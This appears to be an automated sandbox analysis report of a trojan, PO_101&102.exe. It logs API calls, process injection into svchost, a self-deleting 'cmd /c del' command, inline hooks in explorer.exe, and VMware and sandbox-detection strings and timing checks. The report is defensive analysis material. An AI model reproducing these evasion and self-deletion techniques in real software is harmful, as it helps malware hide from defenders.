          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016698F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016695D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016697A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016699D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0166B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016698A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0166A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669A10 NtQuerySection,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669560 NtWriteFile,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0166AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016695F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669760 NtOpenProcess,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0166A770 NtOpenThread,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0166A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016696D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0376A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0376B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0376A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0376A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769560 NtWriteFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0376AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03769520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F5A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F5A490 NtClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F5A410 NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F5A540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F5A48B NtClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F5A40D NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F5A53C NtAllocateVirtualMemory,
          Source: PO_101&102.exe, 00000001.00000002.312254656.0000000004500000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs PO_101&102.exe
          Source: PO_101&102.exe, 00000001.00000002.311135246.00000000033C1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs PO_101&102.exe
          Source: PO_101&102.exe, 00000001.00000000.282576255.000000000103A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameenNNpuJ.exe4 vs PO_101&102.exe
          Source: PO_101&102.exe, 00000001.00000002.310356859.000000000175A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO_101&102.exe
          Source: PO_101&102.exe, 00000009.00000000.303163894.000000000022A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameenNNpuJ.exe4 vs PO_101&102.exe
          Source: PO_101&102.exe, 0000000A.00000002.371671376.00000000015BB000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs PO_101&102.exe
          Source: PO_101&102.exe, 0000000A.00000002.372084013.00000000018AF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO_101&102.exe
          Source: PO_101&102.exe, 0000000A.00000000.306435842.0000000000B9A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameenNNpuJ.exe4 vs PO_101&102.exe
          Source: PO_101&102.exeBinary or memory string: OriginalFilenameenNNpuJ.exe4 vs PO_101&102.exe
          Source: PO_101&102.exeReversingLabs: Detection: 35%
          Source: PO_101&102.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO_101&102.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\PO_101&102.exe 'C:\Users\user\Desktop\PO_101&102.exe'
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess created: C:\Users\user\Desktop\PO_101&102.exe {path}
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess created: C:\Users\user\Desktop\PO_101&102.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO_101&102.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess created: C:\Users\user\Desktop\PO_101&102.exe {path}
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess created: C:\Users\user\Desktop\PO_101&102.exe {path}
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO_101&102.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\PO_101&102.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_101&102.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@2/1
          Source: C:\Users\user\Desktop\PO_101&102.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: PO_101&102.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\PO_101&102.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: PO_101&102.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO_101&102.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: PO_101&102.exe, 0000000A.00000002.371692405.0000000001600000.00000040.00000001.sdmp, svchost.exe, 0000000F.00000002.559918506.0000000003700000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO_101&102.exe, svchost.exe
          Source: Binary string: svchost.pdb source: PO_101&102.exe, 0000000A.00000002.371642195.00000000015B0000.00000040.00020000.sdmp
          Source: Binary string: svchost.pdbUGP source: PO_101&102.exe, 0000000A.00000002.371642195.00000000015B0000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_00F94FA2 push 00000000h; iretd
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_05A29112 push C800055Eh; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_05A290E0 push 5C00005Eh; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_05A22E61 push ecx; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BD9ADE push esi; iretd
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07DF2E23 push esi; retf
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07DF850C push FFFFFF8Bh; iretd
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_00184FA2 push 00000000h; iretd
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041EA41 push eax; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_00407B2B pushfd ; iretd
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041ABC6 push edx; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_00417C75 push eax; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_004164E9 push ebx; iretd
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041D4B5 push eax; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041656B push esp; iretd
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041D56C push eax; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041D502 push eax; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041D50B push eax; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041DD3A push eax; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041D5A6 push eax; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_00403633 push eax; iretd
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_00AF4FA2 push 00000000h; iretd
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0167D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0377D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F5EA41 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F5ABC6 push edx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F47B2B pushfd ; iretd
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F43633 push eax; iretd
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F564E9 push ebx; iretd
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F5D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F57C75 push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.43588694795

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE3
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: /c del 'C:\Users\user\Desktop\PO_101&102.exe'
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: /c del 'C:\Users\user\Desktop\PO_101&102.exe'
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: Process Memory Space: PO_101&102.exe PID: 7016, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: PO_101&102.exe, 00000001.00000002.311209437.0000000003420000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: PO_101&102.exe, 00000001.00000002.311209437.0000000003420000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PO_101&102.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO_101&102.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002F49904 second address: 0000000002F4990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002F49B7E second address: 0000000002F49B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO_101&102.exe TID: 7076Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4292Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\SysWOW64\svchost.exe TID: 4908Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\PO_101&102.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_00F9A8FF sgdt fword ptr [eax]
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeThread delayed: delay time: 922337203685477
          Source: PO_101&102.exe, 00000001.00000002.311209437.0000000003420000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: explorer.exe, 0000000B.00000000.321646424.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: PO_101&102.exe, 00000001.00000002.311209437.0000000003420000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000B.00000000.353798297.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: PO_101&102.exe, 00000001.00000002.311209437.0000000003420000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: PO_101&102.exe, 00000001.00000002.311209437.0000000003420000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000000B.00000000.319717839.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.321646424.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 0000000B.00000000.319717839.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: PO_101&102.exe, 00000001.00000002.311209437.0000000003420000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: PO_101&102.exe, 00000001.00000002.311209437.0000000003420000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: PO_101&102.exe, 00000001.00000002.311209437.0000000003420000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: PO_101&102.exe, 00000001.00000002.311209437.0000000003420000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: PO_101&102.exe, 00000001.00000002.311209437.0000000003420000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 0000000B.00000000.321646424.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0162C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0162B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0162B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01644120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01644120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01644120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01644120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01644120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01629100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01629100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01629100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016B41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0162B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0162B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0162B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A51BE mov eax, dword ptr fs:[00000030h]
